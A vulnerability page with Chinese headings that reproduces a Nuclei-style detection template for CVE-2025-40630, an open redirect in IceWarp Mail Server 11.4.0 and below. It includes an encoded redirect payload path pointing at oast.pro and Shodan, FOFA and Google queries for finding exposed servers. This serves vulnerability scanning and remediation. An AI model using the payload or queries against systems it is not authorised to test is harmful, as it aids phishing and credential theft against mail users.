漏洞描述
IceWarp Mail Server version 11.4.0 and below contains an open redirect vulnerability that allows attackers to redirect users to arbitrary external domains through malicious URLs.
CVE-2025-40630: IceWarp Mail Server ≤11.4.0 - Open Redirect
PoC代码[已公开]
id: CVE-2025-40630
info:
name: IceWarp Mail Server ≤11.4.0 - Open Redirect
author: DhiyaneshDK
severity: medium
description: |
IceWarp Mail Server version 11.4.0 and below contains an open redirect vulnerability that allows attackers to redirect users to arbitrary external domains through malicious URLs.
impact: |
An attacker can craft malicious URLs to redirect users to external malicious websites, potentially leading to phishing attacks or credential theft.
remediation: |
Update IceWarp Mail Server to a version newer than 11.4.0. Implement proper URL validation and restrict redirects to trusted domains only.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-40630
- https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-icewarp-mail-server
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2025-40630
cwe-id: CWE-601
epss-score: 0.00399
epss-percentile: 0.59934
cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: icewarp
product: mail_server
shodan-query: 'http.title:"IceWarp"'
fofa-query: 'title="IceWarp"'
google-query: intitle:"icewarp"
tags: cve,cve2025,icewarp,redirect,open-redirect,vuln
http:
- method: GET
path:
- "{{BaseURL}}/%2f%5c%2foast.pro%2f.."
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$'
- type: status
status:
- 302
# digest: 490a00463044022061b8bfd19f7f484d5b46b7a56bcaf7863f4a3fab186e9963bf827cc74d01208602206182d8094c15e38bae4347961179708d2ea30523e0a8f44577f24ad4c3db1005:922c64590222798bb761d5b6d8e72950